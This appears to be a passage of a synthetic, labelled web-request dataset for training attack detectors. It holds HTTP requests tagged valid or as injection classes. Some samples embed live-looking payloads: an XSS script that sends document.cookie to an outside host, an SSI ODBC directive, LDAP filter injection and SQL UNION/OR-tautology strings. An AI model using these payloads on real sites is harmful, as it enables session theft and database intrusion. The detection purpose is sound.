If-Modified-Since: Tue, 21 Mar 06 19:06:11 GMT
If-Unmodified-Since: Sun, 09 Apr 06 01:11:33 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 671
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM NnQyamd6ZWM4VHNuSUFtcnRlZW5zRmNoaWlhYW90dGV1TnRyWGph
Authorization: Basic dGR1dGFlbmI6dGxvMG4=
Range: 189-,863-
Referer: http://www.en68bo.de/Ao0h/fddi/ose3np.js
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.3 (compatible; MSIE 9.7; Open BSD i386; epSe58h; emueanc; tioiz0cooa)
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0764x660
Via: HTTP/3.2 200.100.236.172, i1t/6.7 48.142.249.33:18
Transfer-Encoding: deflate
Upgrade: 3TN5i/2.0, ahqf9e/8.2, azaefr/2.4
Warning: 770 123.137.130.236 "6enewerc5oeejdr" "Tue, 23 Aug 05 16:07:21 CET"
X-Forwarded-For: 73.70.52.35
X-Serial-Number: 026545042
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23112
Start - Id: 15183
class: Valid
GET /ue9UpqS8V/1kxnjt6ifX/nM3h/bodyiQlibUzcWK@-/f4XVgNMK1V1n_dD/oA9_0JcJ7BgnVHXiCC.shtml?YnO9OQ7wgetx=4787&hwwwp-A=tbnwntvtns3&vYmIO=%5Dnly%26VPm%25aeE1 HTTP/1.1
Host: www.bhDla7e.gov
Connection: close
Accept: */*
Accept-Charset: iso-8859-1, x-mac-ce
Accept-Encoding: deflate;q=0.3, compress;q=0.1, gzip, gzip;q=0.4
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 207.13.17.145
Cookie: 618Luaohhhrdd=optfromi$@aiechosewfe9Dnn;cni2h=0
Cookie2: $Version="45"
Date: Sat, 27 May 06 11:57:54 CET
ETag: W/"bk2jeoA94xu4PM.x0VY"
Expect: 100-continue
From: hhshpbs@mnyd.cz
If-Modified-Since: Fri, 21 Dec 07 01:20:49 UTC
If-Unmodified-Since: Tue, 06 Sep 05 24:56:50 CET
If-Match: "tSdr6_UF-Lg4UuDQZpGd"
If-None-Match: *
If-Range: *
Max-Forwards: 490
MIME-Version: 7.8
Pragma: ee8=Yy
Proxy-Authorization: Basic ekswYTpsSHJlYXJo
Authorization: Basic bEFsRWJweTE6b3NhaA==
Range: 478892-,53727-
Referer: /hidt.mdb
TE: gzip
Trailer: Proxy-Authorization
User-Agent: ystft9bg/3.2.1.3.6
UA-CPU: x86
UA-Disp: 5093,9820,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1443x630
Via: 7.7 www.no4V4u.html, 2.1 www.nmiomitr.jpeg
Transfer-Encoding: compress
Upgrade: 7jpt9/1.4, who/8.3, alnadh/2.9, eAa/5.4, imc/9.8
Warning: 940 www.7e6Amp.css "or1sYlicdjeTtw" "Tue, 20 Nov 07 12:31:11 CET"
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 656353
----: ----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 15183
Start - Id: 38475
class: LdapInjection
GET /nuDHAXOmRJbB/6oooa/twaeneoEcorfes3/172enaetoLyC/tdoKiDGiW7VHWpQfsP7-/unfXb9/mc6gG-/noscMtitdua.gif?eNoAsownuDe2=TcSBh%29%28++++%7C+%28epesd%3D*%29&H3e=n0OALi&eeteosenf=https&jyadS=8058536 HTTP/1.1
Host: www.nl7oz.it
Connection: close
Accept: video/mpeg;q=0.6, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rbeelpn-o, att-te7dp4
Cache-Control: no-transform
Client-ip: 23.7.129.65
Cookie: noiatSeen=462VQqZi3wzp;prz9Lt=51852086;rrei=)yiwhereoc?risimgrt;oereD=btpkeoto
Cookie2: $Version="51"
Date: Fri, 24 Jul 09 02:06:14 CET
ETag: W/"HdLDJ1hGjmZABeS"
Expect: 100-continue
From: odvt@tmdyhis.org
If-Modified-Since: Tue, 01 Nov 05 05:50:47 GMT
If-Unmodified-Since: Wed, 02 Nov 05 21:26:07 UTC
If-Match: "f@AaqtaWQoq3b2d5Vg"
If-None-Match: *
If-Range: Wed, 06 Dec 06 24:52:01 CET
Max-Forwards: 129
MIME-Version: 6.7
Pragma: tsdp0due='hpl'
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: NTLM YThnZW5wb3RrY2dFc2Rod2RvSHVicml5dTJhRHN1Y2xiYWh0aG5tdG5kYVF4
Range: 24-,76759-,-19589
Referer: /5atnqzl/teae/zmss.avi
TE: chunked,gzip,gzip
Trailer: Cache-Control
User-Agent: ahrpexiB (h7Jx8MkS)
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0403x7270
Via: HTTP/8.2 www.esNa.jpg, HTTP/4.2 50.206.238.222, 1.4 77.17.13.166
Transfer-Encoding: deflate
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 863 www.oneLt.gif "lrRpIern" "Sun, 11 Oct 09 06:27:08 UTC"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38475
Start - Id: 47317
class: XSS
GET /nl2sDahtnurLgrm/ti6rTq6x0gTD7hu/buhueywSp/ealffo.nsf?DtIh=oI%29+ddhec&4f4mtt=2nair%25&eIiqya=-i%3F%27aiyriN3no%7Etmp&eedd=95419780&0noEntscergh=%3Cstyle+++%3E%3C%21--%3C%2Fstyle++++%3E%3Cscript++%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.altaitna.com%2Fcgi-bin%2Flaonic.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E&Iiaw=window.openwiet&owtseqixuahjnie=esi1he&ghyptay=63&iohdi=dXl5in&se=18&R@n6insert=5407&aiunt4gc=s HTTP/1.0
Host: www.ewouat.it:8183
Connection: iTaabSrh
Accept: */*
Accept-Charset: euc-tw;q=0.5, koi8;q=0.2, iso-10646-ucs-2
Accept-Encoding: gzip;q=0.1, identity;q=0.4, deflate
Accept-Language: *;q=0.4
Cache-Control: max-stale=18078
Client-ip: 188.124.236.19
Cookie: octrfEElophoih=670;inziylo=uEiN;letsej6eee=2Navebe;ttqeed=cscripteinclude nodeb3qb;n3teORtfliw1=mNsa7T0;e$ei;5qnHiwnrtd=944184
Cookie2: $Version="508"
Date: Mon, 10 Mar 08 22:03:29 CET
ETag: W/"tViHpc6x1H6fcLzNQ"
Expect: 100-continue
From: ntsn@eneotga.ch
If-Modified-Since: Thu, 26 Feb 09 07:36:01 GMT
If-Unmodified-Since: Sun, 06 Aug 06 13:47:18 UTC
If-Match: *
If-None-Match: *
If-Range: "gcjlFnE8zU3h_gb"
Max-Forwards: 533
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Basic RWo5aG9Zd2s6dWV0Y3NldA==
Range: -827060,69-,229-399617
Referer: http://fntdDtn.de/uy9nrrt/hlet/b8uatai.rar
TE: chunked
Trailer: If-Match
User-Agent: 0esaEe46d (t6WQdyM; lOJXpCI1; aTWa5D7a)
UA-CPU: Sparc
UA-Disp: 6722,405,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5306x1733
Via: 0.4 www.acty.css, HTTP/1.8 7.17.142.252, 4.4 www.i2fewi.jpeg
Transfer-Encoding: identity
Upgrade: ddnzgk/3.0, pnnt/9.2, eehf/9.2
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 151.1.251.143
X-Serial-Number: 126620
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47317
Start - Id: 40825
class: SSI
GET /wMCI8uS7c7I.J.asmx?rieDalibnodio=%3C%21--++%23odbc++++connect%3D%22egmeieW%2Cden%2Caaal%22++++++statement%3D%22select+++++*++++from+++++ase%22--%3E&oTIV=2024581 HTTP/1.1
Host: www.aRmnd8hose.biz
Connection: close
Accept: video/*;q=0.0, image/png
Accept-Charset: isiri-3342;q=0.8, euc-jp, x-mac-greek;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-stale=39
Client-ip: 194.176.168.208
Cookie: CzjIztmp9WF02=gmmtlcs;aseyteotifs=ss;or;Ibspsulxsddso=550713;bkyTj=vTsH6EtSS.x;hhHselcS=77260;rsuzErizyo=hlibn\cnri
Cookie2: $Version="76"
Date: Sun, 12 Dec 04 12:38:11 GMT
ETag: W/"kwmIzY..D6fs-WSA0"
Expect: R4w4=f6aeth
From: kpa1hln@eotgi.biz
If-Modified-Since: Tue, 10 Feb 04 18:25:50 CET
If-Unmodified-Since: Fri, 20 Mar 09 13:48:03 UTC
If-Match: "uV1Lq.TCBTr0OTnJ"
If-None-Match: *
If-Range: Sat, 10 Mar 07 12:00:02 GMT
Max-Forwards: 67
MIME-Version: 9.6
Pragma: t=iIand
Proxy-Authorization: es08e taeiRD8d=u4req1e
Authorization: NTLM MXJzd0RibmVTaWVJZmNpMW9ld21lRTFucXJzZXdlZGRueWhlZQ==
Range: 90-,846222-
Referer: /wvni.bin
TE: chunked;q=0.7,chunked,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.4 (Windows; U; Windows NT 2.5; 3t-4o; rv:1.0.2) Gecko/10535314
UA-CPU: PowerPC
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 477x827
Via: 1.6 www.a4ip.shtml, HTTP/2.0 103.117.110.226
Transfer-Encoding: deflate
Upgrade: dns/1.4, Irtee/1.9
Warning: 601 42.121.7.112:3 "rlcreLunhecrNsee" 
X-Serial-Number: 623411
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40825
Start - Id: 13810
class: Valid
GET /uxgsBeasifauIl/eacnke/omErtetc.exe?Rxp_Trs2=araTrlrgr&ndT6jaemn=2665958&7sCtsneEyv=24 HTTP/1.0
Host: 118.65.138.160:7266
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.7
Accept-Encoding: 
Accept-Language: d-c;q=0.4, OnE-1nr5e, dkxdee-2;q=0.0
Cache-Control: no-transform
Client-ip: 237.204.86.87
Cookie: tu2itxlt=97986
Cookie2: $Version="5"
Date: Tue, 02 Oct 07 02:57:54 UTC
ETag: "GSILO7Th1taqOUKnQita"
Expect: 100-continue
From: zis2sn@7uctepet.net
If-Modified-Since: Thu, 20 Oct 05 01:46:17 CET
If-Unmodified-Since: Tue, 28 Sep 04 10:23:01 UTC
If-Match: "FDRjY-wjA.O8-ZExH"
If-None-Match: "7NZUtngxAN61Csr"
If-Range: Fri, 16 Dec 05 04:18:49 CET
Max-Forwards: 520
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nc=C66bc94A
Authorization: Digest nc=C1D2c6ac
Range: -658220,9-,-209
Referer: /ogkiRef/tsaw/ut9zDeZ/rlt2neh/niepmgfO.mp3
TE: trailers
Trailer: From
User-Agent: Mozilla/0.9 (Windows; U; WinNT 4.6; al-7y; rv:4.8.7) Gecko/41874756
UA-CPU: 68000
UA-Disp: 1686,350,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 750x449
Via: FTP/2.5 www.bonzuvg.jpeg, bbzte/2.2 45.233.56.132
Transfer-Encoding: gzip
Upgrade: liu/3.9, ah1/5.7
Warning: 666 84.76.236.184 "t0uoITqzpy2Sloui" 
X-Forwarded-For: 242.252.112.161
X-Serial-Number: 4673699275390197026
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13810
Start - Id: 14919
class: Valid
GET /bwZOvgD19zpjog/yYAFxkBHinHwo/netcat7Byi9@h/1ZrorvSKNUJ/tMJKofsPA4m_bz8iQ/thfn/N@TsVjUN66/eYiN/VdPlupdateCitmp.h.pl? HTTP/1.1
Host: www.ehiaEtuC.biz:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253, iso-8859-8-i, iso-2022-kr;q=0.3
Accept-Encoding: gzip, deflate;q=0.6, compress;q=0.8
Accept-Language: s-tnrS5, eo-l4hsr17l;q=0.4, nAseai-o3sre9h
Cache-Control: max-stale=87390
Client-ip: 72.62.132.226
Cookie: deeAietl=ieteN;myet=raT;Omrtadleapelg=ws9T;seaiy=al;nn=)s(E
Cookie2: $Version="2"
Date: Fri, 07 Oct 05 18:29:57 UTC
ETag: "gPd@-AJtuX3KeUkp_L"
Expect: ttuUjro
From: euttgc3@centj.net
If-Modified-Since: Wed, 30 Jun 04 09:14:03 CET
If-Unmodified-Since: Mon, 23 Nov 09 21:45:08 GMT
If-Match: "8qWYi6.nyKnz_i@WwXWd"
If-None-Match: *
If-Range: *
Max-Forwards: 5173
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dDhsmu"
Authorization: NTLM YXJkSTlhNlNoRG5ib3NlbWNvcXJkbm5zZjR0YXJtclRld25paXR1
Range: -14906,6-959
Referer: http://tacri.org/tNrcNm/5nTetts.tar.gz
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/3.5 (Windows; U; Win 9x 8.3; Ci-we; rv:9.1.3) Gecko/00982233
UA-CPU: PowerPC
UA-Disp: 509,721,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6967x560
Via: 6.2 143.179.62.105:3, 8.6 www.wem1eaqD.tiff, 5.4 www.EeyihiiT.css
Transfer-Encoding: gzip
Upgrade: Hlt/0.3, j5p/9.9, ouktu/7.8, yeiroi/9.1, hPi1/6.2
Warning: 194 www.rm0lai.jpeg "gocxkLhNTt9pfsEbecg" 
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 580548431954980
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14919
Start - Id: 21243
class: Valid
GET /felcmrbtBtEr3Tyndp3x/TBr2hbrfh9hseisuIt/tZGRvZBC03iD/zSI.mspx?nr=iwp-e%3Ed&ui8Yorsi=tnoegtocYmi&dehoti1r=do%24c&Uzhndh=nrplaombt5&nJN-4W2tmpF=glsrbnll%7CN%7E%2Fe4%3Elk&mdoZ=cetloeu HTTP/1.1
Host: 112.149.5.3:07
Connection: close
Accept: application/*
Accept-Charset: *
Accept-Encoding: compress;q=0.5, identity;q=0.6, identity;q=0.0, gzip
Accept-Language: gcac-oerhrjt;q=0.2, q-vhnnibmn;q=0.1, idd-llmig, apeL5s-imopasse;q=0.1, atw-cdefgh9;q=0.4
Cache-Control: sa='yenbRCn'
Client-ip: 228.188.144.29
Cookie: asriideroztcaoe=cXp2BNL1;tepeoOie=o;tiiotiTien=y6Ij;rasrggn7=8
Cookie2: $Version="80"
Date: Mon, 03 Sep 07 24:48:05 GMT
ETag: "Pn7wpUNRDgZuyN1"
Expect: 100-continue
From: ptioedep@ccuCnl.it
If-Modified-Since: Sun, 21 Mar 10 13:16:38 UTC
If-Unmodified-Since: Fri, 06 May 05 09:50:32 CET
If-Match: "203lV5qKiyV_vdT0qy."
If-None-Match: "F.wh-7tlxmgZmqE"
If-Range: *
Max-Forwards: 9920
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: eneeli er7ERg=7lpaaro
Authorization: Digest nonce
Range: 514-56,34-,2775-22974
Referer: /ib4rrr.cgi
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/7.8 (Machintosh; U; Mac OS X 2.3; qh-As; rv:0.9.9) Gecko/13343307
UA-CPU: PowerPC
UA-Disp: 664,7142,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 412x6900
Via: FTP/3.0 224.187.210.24, 1.4 www.eNztnn.gif:09, 5.9 56.85.12.131
Transfer-Encoding: gzip
Upgrade: haa/9.3, huv3/3.6, doiifo/1.0
Warning: 105 220.45.75.184:10 "ytobtcpe0cmlaiagf7in" "Sun, 01 Jan 06 03:01:20 CET"
X-Forwarded-For: 243.148.157.212
X-Serial-Number: 323295
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21243
Start - Id: 27888
class: Valid
GET /o6pl9onddoeZhe/8TfU3X4QbinF/QEnXncAetcpp.SL/sikm8/itSFNuU7Yggg67u3nGU/V4PnodeSf_/kmo.js?WqSo1.null=gxqf9bw7Gq&smOprlkxesne=bmcmd&ytTix4=hcbgad9&watji=9315825480 HTTP/1.1
Host: 110.245.45.225
Connection: tredfio
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.3, deflate, deflate;q=0.8, gzip
Accept-Language: nnirnn-t0at
Cache-Control: hven3s='weucnwa'
Client-ip: 218.21.80.173
Cookie: zzmee1Ae=g3al84rDg7;4sh4eEgr6mt=90zd
Cookie2: $Version="56"
Date: Thu, 07 Oct 04 11:28:04 UTC
ETag: "3bi8TVg5_pidMUIy"
Expect: irefgwes=anxS
From: naOe@fsh5cXZ.uk
If-Modified-Since: Sun, 23 Dec 07 20:57:02 CET
If-Unmodified-Since: Sat, 01 Nov 08 14:36:32 CET
If-Match: *
If-None-Match: "x2V5X11rCsYQZ-ATg"
If-Range: Sat, 28 Oct 06 23:25:01 GMT
Max-Forwards: 7
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic N2E5VW9lOmJvZWFu
Authorization: nmsis apcs=bees5
Range: 6-04307,08-
Referer: http://www.pekrrP.de/dlh2mtw/Iaondtai/eetd.nsf
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.6 (Windows; U; WinNT 2.2; ph-1a; rv:4.4.0) Gecko/76428969
UA-CPU: x86
UA-Disp: 3738,726,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 869x220
Via: HTTP/6.0 www.yoUPe4i.shtml
Transfer-Encoding: gzip
Upgrade: nen/9.1, a8m/4.8, eeIy/6.6, o06on/8.4, 6jt5s/6.6
Warning: 179 www.snrm.css "8ebbnsessuhaeisimedl" 
X-Forwarded-For: 122.11.217.222
X-Serial-Number: 8614528725280
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27888
Start - Id: 41512
class: SqlInjection
PUT /PljXFR/otZTr7esrPaie9tde/2hEsneiodnj9/dhtettm0RttgSweer2/ds9SotibeuIae/aa4jBYKQ4xBeHCgKUmC/erEsad0eemAUt/lJHbPo_q0/edjtolbotb.cfm? HTTP/1.1
Content-Length: 257
Content-Language: rG8aatle,eas,aa
Content-Encoding: deflate
Content-Location: /8flhi/AgUosHgo/nr2EwuLh/reimc.ace
Content-MD5: d3NibkViNm93amVmdnNiZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Nov 09 17:26:35 CET
Last-Modified: Sun, 25 Sep 05 24:33:50 UTC
Host: 238.189.3.244
Connection: close
Accept: video/quicktime, application/*;q=0.5, text/html;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.5
Accept-Language: Acso-eSl, b7ke-d01hnolr;q=0.5, mnsst-3u3eeoug, em0sht4e-mrQbzoou, p-goenae9r
Cache-Control: no-cache
Client-ip: 3.75.152.42
Cookie: vlAa=ohtaccesIae;ltedeYd5=qo.NCNe0;emwAdnE0=eoweetRAe;eJ=su;itRrnLert=73702522;0ttad=70
Cookie2: $Version="3"
Date: Sat, 23 Aug 08 04:53:05 GMT
ETag: "_vMH@4MNLWv9FY-"
Expect: maEbbf
From: pfpr@iosyoa.gov
If-Modified-Since: Sat, 05 Apr 08 02:41:36 UTC
If-Unmodified-Since: Wed, 19 Dec 07 19:03:33 UTC
If-Match: *
If-None-Match: "zhQtOCN1clAtH_d4pSbU"
If-Range: "64dO49Kdaw1CfECuFP1"
Max-Forwards: 441
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic ZkkyNTpucm9z
Authorization: Basic OG05c2w6ZzNBa0x0
Range: 229-94,-0,-455
Referer: http://www.rheieDn6.cz/oegymq/uvdergan/xTSa/eia3rd/hAtoId.exe
TE: chunked,trailers
Trailer: User-Agent
User-Agent: bshNeMl/9.0.7
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: 6.8 18.225.202.66, HTTP/2.0 77.145.115.99, dHHocs/2.6 www.65gu7c4.html
Transfer-Encoding: compress
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PPm5m_=' ) UNION     ALL   SELECT   819     FROM   ieMpeie    WHERE ( ''=    '&rtAeI2mh7eh=4649827&7.bQ3Y=e]r&neg2eiaEnreiut=Ihi&7n=662931&4KWTdropKXqVoW0=omk-Cu&SdPat0mn=umOegttwrxhspee5&ea7npn=uss3Ac4c&hal7zenn5=&xp_&Rp6Kx4r=shutdowns\

End - Id: 41512
Start - Id: 18975
class: Valid
GET /G5KzORN3HJhomeI_B/EnorffnsSsp/81ts6/5WcdBf7/eepcstn2oezbvsirEcz.sh?cetbfrNhn8x3T=GqMi&EteRWZcdueo=rEaps&tepfxc=4270&Akan=28646&e4rca4dHpnrrNae=notnnotteecslij&emslbeoSnhed=omVAIcy&anetf5udrhmub=zgunionaxtermcsSe%40nAm&goers=objectscty&oer2hosfH=331&tnmo1iruoi=41778429&cyeexntose0aji=zygBrno&ddrcrtrdiieAte=s6ctoE&s4rayiaTeoh5=0021136577 HTTP/1.0
Host: www.eeowaijCeg.uk:94544
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: teoaoTho-rlcoy, sthe-rwEH0;q=0.1, dyOacnnb-ezoi1B;q=0.7
Cache-Control: el1b3=e
Client-ip: 233.32.130.113
Cookie: nsptr=e;1UIobjectpJx8ZOy=nuoeaa6;dtirchgz=hdcQbjtdIt;0m7a=enYjed6LCe/eE;ottEa0smNRrLao5=s4Dmctmp;PZsdapngetrTi0=ledkE.B
Cookie2: $Version="5"
Date: Sun, 18 Dec 05 17:33:10 GMT
ETag: "1LxG-41DxiNy9.n8Y-m"
Expect: snhsa=sroukt;UaSeee
From: l14gyjst@isddra.be
If-Modified-Since: Thu, 25 Jun 09 05:47:47 UTC
If-Unmodified-Since: Sun, 18 Jun 06 10:20:05 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Apr 04 19:10:51 GMT
Max-Forwards: 33
MIME-Version: 9.9
Pragma: ehieabte='1riimvt'
Proxy-Authorization: NTLM a1RjaG9ib2pudDZvdGpDUjRhYWl4cnBpZWVydGtlc3Uz
Authorization: Digest qop=iw3nbe0
Range: 63-4,19-3,96935-
Referer: /0og2o/pt2ilzd/dthcsj/ce4sld/izrao.php
TE: gzip;q=0.9,trailers,chunked;q=0.0
Trailer: Accept-Encoding
User-Agent: ad1wtfn/3.1.4.3.1
UA-CPU: 68000
UA-Disp: 2989,0086,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 378x534
Via: HTTP/2.5 www.binc.png:340
Transfer-Encoding: compress
Upgrade: tre/5.6, eMW/5.6, erle/4.7
Warning: 319 www.seEeeme.shtml:62 "entaH6oantt2mash" 
X-Forwarded-For: 166.105.2.220
X-Serial-Number: 27260320301
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18975
Start - Id: 34533
class: Valid
PUT /3Qe1Dkd1v/tOCs5de/sbfN@i6@uyu90qDAbX/1hZdBzeP/ahFWXjko@j/HimgDpICtxJLi/nnms1vwksiNt/wndaenmtq0.bin? HTTP/1.0
Content-Length: 126
Content-Language: orodA,exxav
Content-Encoding: gzip
Content-Location: /stlc.ace
Content-MD5: Zmh6U2h0ZWtzc2hlaW5icg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Feb 09 13:14:31 UTC
Last-Modified: Wed, 19 Jul 06 15:05:37 GMT
Host: 249.62.88.234:80
Connection: close
Accept: video/*;q=0.2, video/*;q=0.0, text/xml
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, deflate;q=0.8
Accept-Language: gegrc-y4;q=0.7, hnA-Wn;q=0.1, nxooif-aeeaem, lsnbr-xtLize;q=0.1
Cache-Control: no-store
Client-ip: 217.109.107.241
Cookie: ddahaA4i3l=spjGemH7;greo=L$;3Rvj=ie2z;li=aCk
Cookie2: $Version="126"
Date: Thu, 28 Apr 05 09:10:38 UTC
ETag: W/"7qYPQypdF@88Fibj"
Expect: 100-continue
From: aiiTbdt@stretps.it
If-Modified-Since: Wed, 14 Mar 07 23:57:14 UTC
If-Unmodified-Since: Thu, 06 May 04 09:28:15 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 0.1
Pragma: Yj2j='eizt'
Proxy-Authorization: Basic ZVMyZ2F0OnN1cnRldmN5
Authorization: NTLM aHJzYU5laGlic09iYWlvZGlzZW1oYTlFc2FkdTZ5b21l
Range: 934-
Referer: /whMiteel/z5merf.swf
TE: gzip;q=0.8,trailers,trailers
Trailer: Via
User-Agent: lsbsifrhczesrsb
UA-CPU: MIPS
UA-Disp: 245,2195,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 066x785
Via: 7.8 www.ddxfu.css:078
Transfer-Encoding: qseerg; IhtDbhT=ttoel
Upgrade: 6Oq/6.2, ioU8nf/2.3
Warning: 065 65.77.102.167 "nhro5a2" 
X-Forwarded-For: 38.219.193.159
X-Serial-Number: 52771929
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~

moachii9=~ahbh ncpULaobject&thprul=596841521&benun1yAiiur=ntsNzs&hihei=n&hr~hshmlte7nn|he&jtwlsr=fh&iQLY38-8YF=3265894

End - Id: 34533
Start - Id: 19142
class: Valid
GET /ytY_gQK3SuY2vgawFEk.gif?GEM@6=rus3booptrralCn&c3vhoc=ey.uou0m&geaheeps=29621 HTTP/1.1
Host: 243.17.194.5:9321
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: identity, identity, compress;q=0.8
Accept-Language: ndeoti-5;q=0.9
Cache-Control: y8q='d0'
Client-ip: 40.88.186.196
Cookie: sz=huo;clibAbk2k=0onnf;ntDrijjj=oVIo7fYC;YmlradauNl5et=259;e2Zitdnjgtni=55426567;9ha=aaohibokan
Cookie2: $Version="78"
Date: Sun, 07 Mar 04 11:00:57 UTC
ETag: W/"eKP35ifDThMvjLc-p"
Expect: 100-continue
From: wi5la4tl@ue6nMine5.biz
If-Modified-Since: Wed, 28 Jan 04 24:32:01 UTC
If-Unmodified-Since: Mon, 20 Feb 06 06:15:46 UTC
If-Match: *
If-None-Match: "E@57J6ZbjFf.5xgIk2Z"
If-Range: "MKSQEd0Ac.1gCKr1pS"
Max-Forwards: 120
MIME-Version: 0.1
Pragma: scAoBchU=mltoitsb
Proxy-Authorization: NTLM N25qRXB5YW5BNk92Nk55aWVlbm1Dc2hzYW5heXNTd3JtaW55
Authorization: NTLM ZWhuY3RydHNVUHRldGFpZWt0ZGEyaWVlaXc2bGNhaXRhdHNncWV4Yw==
Range: 0922-58,430-
Referer: http://www.xxif.gov/nhptL.txt
TE: trailers,trailers,chunked;q=0.5
Trailer: Accept
User-Agent: Mozilla/2.1 (X11; U; Open BSD i586 3.6; se-oo; rv:8.4.2) Gecko/51479736
UA-CPU: x86
UA-Disp: 070,359,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 047x447
Via: FTP/3.0 193.52.213.97:4703
Transfer-Encoding: Rdleee
Upgrade: niotsE/9.5, 6anas/4.2
Warning: 420 www.actoit.htm "nyml7olireede" "Tue, 02 Nov 04 22:52:56 UTC"
X-Forwarded-For: 144.215.252.39
X-Serial-Number: 680648582
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19142
Start - Id: 42759
class: SqlInjection
POST /ecgZIsMZc9v1YSllu./bpnaThJ/ea/r5E0lg_i-X/BxmlB0q.htm? HTTP/1.0
Content-Length: 228
Content-Language: aewpsa
Content-Encoding: compress
Content-Location: /n4riat/qtwS/tEeu.mp3
Content-MD5: b1RlbmVobGp1T3RzdGF0bg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Dec 07 16:11:31 GMT
Last-Modified: Wed, 22 Dec 04 11:05:29 UTC
Host: 162.15.26.4
Connection: eqqn
Accept: */*;q=0.8
Accept-Charset: iso-8859-7, x-mac-roman;q=0.5, cp-936;q=0.8
Accept-Encoding: compress;q=0.5, gzip;q=0.3, identity;q=0.2
Accept-Language: *
Cache-Control: tle7ur='eeat6ys'
Client-ip: 77.205.35.100
Cookie: oNti6aPbifpao=' OR 'iaeafto'   = ' ;ftpCtyZAPG04=Aa
Cookie2: $Version="823"
Date: Sat, 09 Dec 06 01:43:55 GMT
ETag: "t.6zCsqA.08upxK7b"
Expect: 100-continue
From: ehrms74s@essu1ta.fr
If-Modified-Since: Tue, 07 Apr 09 22:31:13 CET
If-Unmodified-Since: Thu, 29 Dec 05 23:09:38 GMT
